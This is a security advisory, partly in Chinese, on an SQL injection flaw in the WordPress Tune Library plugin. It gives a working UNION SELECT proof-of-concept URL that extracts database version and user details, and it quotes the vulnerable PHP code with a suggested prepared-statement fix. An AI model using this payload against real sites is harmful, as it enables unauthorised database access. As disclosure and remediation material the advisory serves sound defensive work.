WordPress Tune Library 插件 <= 2.17 SQL 注入漏洞
# 漏洞名称: WordPress Tune Library plugin <= 2.17 SQL Injection Vulnerability
# 日期: 2011-09-10
# 作者: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# 软件下载: http://downloads.wordpress.org/plugin/tune-library.zip
# 版本: 1.5.1 (tested)
# 注释: 利用前提:magic_quotes 必须处于关闭状态;
#       插件设置 “Filter artists by letter and show alphabetical navigation” 必须处于开启状态
poc:
http://www.91***.org/wp-content/p ... -ajax.php?letter=-1 UNION ALL SELECT CONCAT_WS(CHAR(59),version(),current_user(),database()),2--%20
---------------
Vulnerable code
---------------
// Excerpt quoted by the advisory; each "..." line stands for code the advisory omits.
// The 'letter' request parameter is copied as-is: no validation, length check or
// escaping is visible between this assignment and its use in the query below.
$artistletter = $_GET['letter'];
...
// The vulnerable branch is the final else: it is reached only when
// $options['oneletter'] is not false and $showallartists is not true
// (presumably the "filter artists by letter" plugin setting -- confirm in the plugin source).
if ($options['oneletter'] == false || $showallartists == true)
...
else
{
if ($artistletter == '#')
...
else
{
// Root cause: the request value is concatenated inside the quoted LIKE pattern, so its
// content becomes part of the SQL statement text instead of being treated as data.
// Mitigation: bind the value rather than concatenating it, e.g.
//   $wpdb->prepare("... artist LIKE %s ORDER BY artist", $wpdb->esc_like($artistletter) . '%')
// and reject any 'letter' value that is not a single expected character before querying.
$querystr ="SELECT distinct artist, 'artist' as source FROM " . $wpdb->prefix . "tracks where artist != '' and artist like '" .$artistletter . "%' order by artist";
}